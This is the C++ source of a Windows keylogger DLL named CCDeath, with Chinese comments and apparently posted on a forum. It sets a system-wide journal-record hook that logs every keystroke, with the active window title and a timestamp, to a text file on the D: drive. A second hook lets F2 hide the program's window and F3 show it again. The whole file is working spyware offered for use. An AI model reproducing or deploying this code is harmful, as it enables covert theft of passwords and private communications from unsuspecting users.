- CCDeath_DLL.cpp文件
- #include "afx.h"//file頭文件
- #include "windows.h"
- #pragma data_seg("MySec")//創建一個節
- HHOOK g_hKeyBoard=NULL;//鍵盤記錄
- HHOOK g_hFuncKeyBoard=NULL;//用來隱藏和顯示窗口
- HWND g_hWnd=NULL;//保存一個窗口句柄,必須副初值
- HWND g_hLastFocusWnd=NULL;//記錄上次得到焦點的窗口句柄
- const int g_KeyPressMass=0x80000000;//鍵盤掩碼常量
- char ch=NULL,str[10]={0};//ch保存虛擬鍵的值
- FILE *stream=NULL; //文件流輸入文件
- HWND g_hCurrentFocusWnd=NULL;//當前焦點的窗口句柄
- char szTitle[200]={0};//當前窗口的名稱
- char szTime[100]={0};//當前的日期
- char g_prevChar=NULL;//保存上一次按鍵值
- #pragma data_seg()
- #pragma comment(linker,"/section:MySec,RWS")//連接到連接器里面
- //
- //
- //
- //處理過程
- LRESULT CALLBACK JournalRecordProc(
- int code, // hook code
- WPARAM wParam, // undefined
- LPARAM lParam // address of message being processed
- )
- {
- if(code==HC_ACTION)
- {
- EVENTMSG *pEvtMsg = (EVENTMSG *)lParam;
- //和時間
- stream = fopen("D:\\CCDeath.txt","a+t");//創建一個文件流指針向該文件
- //處理按鍵消息
- if(pEvtMsg->message==WM_KEYDOWN)
- {
- int vKey= LOBYTE(pEvtMsg->paramL);//取得虛擬鍵值
- g_hCurrentFocusWnd=GetForegroundWindow();//取得當前活動窗口句柄
- if(g_hLastFocusWnd!=g_hCurrentFocusWnd)
- {
- GetWindowText(g_hCurrentFocusWnd,szTitle,256);//獲得標題
- g_hLastFocusWnd=g_hCurrentFocusWnd;
- SYSTEMTIME mytime;//獲得當前時間與日期
- GetLocalTime(&mytime);
- CString m_time,m_Space,m_Back;
- m_time.Format("\r\n記錄時間:%d年%d月%d日,%02d小時%d分鐘%d秒\r\n記錄的文件名:",mytime.wYear,mytime.wMonth,\
- mytime.wDay,mytime.wHour,mytime.wMinute,mytime.wSecond);
- m_Space="\r\n---------------------鍵盤鉤子為您記錄 BY:DEBUG----------------------";//開頭
- m_Back="\r\n記錄的內容:\r\n";//結束
- fprintf(stream,"%s%s%s%s",m_Space,m_time,szTitle,m_Back);//寫入文件
- }
- //測試SHIFT,CAPTION,NUMLOCK等鍵是否按下
- int IsShift = GetKeyState(0x10);
- int IsNumLock = GetKeyState(0x90);
- int IsCapsLock = GetKeyState(0x14);
- bool bShift=(IsShift & g_KeyPressMass)==g_KeyPressMass;
- bool bCapsLock=((IsCapsLock & 1) ==1);
- bool bNumLock=((IsNumLock & 1) ==1);
- if(vKey>=48 && vKey<=57)//數字0到9
- {
- if(!bShift)//shift+1=!上檔鍵
- {
- fprintf(stream,"%c",vKey);//寫入0到九
- }
- }
- if(vKey>=65 && vKey<=90)//字符大寫A-Z
- {
- if(!bCapsLock)//沒有大小鎖定鍵
- {
- if(!bShift)//Shit+A=a \A+32=a;
- {
- ch=vKey+32;
- }
- else ch=vKey;
- }
- fprintf(stream,"%c",ch);
- }
- if (vKey >=96 && vKey<=105) // 小鍵盤0-9
- {
- if (bNumLock) fprintf(stream,"%c",vKey-96+48);
- }
- if (vKey>=186 && vKey<=222) // 其他鍵
- {
- switch (vKey)
- {
- case 186:if (!bShift) ch=';'; else ch=':';break;
- case 187:if (!bShift) ch='='; else ch='+';break;
- case 188:if (!bShift) ch=','; else ch='<' ;break;
- case 189:if (!bShift) ch='-'; else ch='_';break;
- case 190:if (!bShift) ch='.'; else ch='>';break;
- case 191:if (!bShift) ch='/'; else ch='?';break;
- case 192:if (!bShift) ch='`'; else ch='~';break;
- case 219:if (!bShift) ch='['; else ch='{';break;
- case 220:if (!bShift) ch='\\'; else ch='|';break;
- case 221:if (!bShift) ch=']'; else ch='}';break;
- case 222:if (!bShift) ch='\''; else ch='\"';break;
- default:ch='n';break;
- }
- if (ch!='n') fprintf(stream,"%c",ch); //n是110n回車 此時應該換行才對
- }
- if(vKey==9) //TAB
- fprintf(stream,"%c",'\t');
- if(vKey==13) //回車鍵
- fprintf(stream,"%c",'\n');
- }
- fclose(stream);
- return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
- }
- if(code<0)
- {
- return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
- }
- // return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
- }
- //用來程序的隱藏
- LRESULT CALLBACK KeyboardProc(
- int code, // hook code
- WPARAM wParam, // virtual-key code
- LPARAM lParam // keystroke-message information
- )
- {
- if(VK_F3==wParam)
- {
- ShowWindow(g_hWnd,SW_SHOW);
- }
- if(VK_F2==wParam)
- {
- ShowWindow(g_hWnd,SW_HIDE);
- }
- if(VK_F4==wParam)
- {
- SendMessage(g_hWnd,WM_CLOSE,0,0);
- UnhookWindowsHookEx(g_hFuncKeyBoard);
- UnhookWindowsHookEx(g_hKeyBoard);
- }
- return 0;
- }
- //安裝鉤子
- void InstallHook(HWND hWnd)
- {
- g_hWnd=hWnd;//對窗口進行操作,比如隱藏之類的
- if(g_hKeyBoard==NULL)//安全性判斷
- {
- g_hKeyBoard=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle("CCDeath_DLL"),0);
- }
- if(g_hFuncKeyBoard==NULL)
- {
- g_hFuncKeyBoard=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,GetModuleHandle("CCDeath_DLL"),0);
- }
- }
- //御載鉤子
- void UnloadHook()
- {
- if(!g_hKeyBoard)
- {
- UnhookWindowsHookEx(g_hKeyBoard);
- g_hKeyBoard=NULL;
- }
- if(!g_hFuncKeyBoard)
- {
- UnhookWindowsHookEx(g_hFuncKeyBoard);
- g_hFuncKeyBoard=NULL;
- }
- }
|
QQ好友和群
QQ空間
騰訊微博
騰訊朋友
收藏
淘帖
頂
踩
